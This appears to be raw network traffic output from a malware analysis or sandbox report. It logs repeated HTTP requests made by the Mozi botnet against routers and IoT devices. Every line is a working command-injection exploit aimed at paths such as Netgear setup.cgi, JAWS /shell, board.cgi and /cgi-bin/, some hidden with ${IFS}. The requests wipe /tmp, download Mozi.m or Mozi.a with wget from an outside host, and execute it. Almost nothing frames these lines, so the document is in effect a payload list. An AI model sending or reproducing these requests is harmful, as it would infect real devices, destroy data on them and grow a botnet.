                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 160.228.159.11:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.99.110.144:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 36.103.157.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 210.134.5.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 124.231.148.9:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 149.249.135.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 58.51.244.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 167.41.169.186:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 83.65.122.222:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 212.75.2.152:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 140.197.218.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 61.241.212.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 142.84.25.59:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 74.19.36.31:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 56.187.33.111:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.97.132.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.84.60.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 49.157.167.183:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 27.168.185.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 156.138.134.244:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 146.221.201.161:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.126.250.64:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 88.9.119.224:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
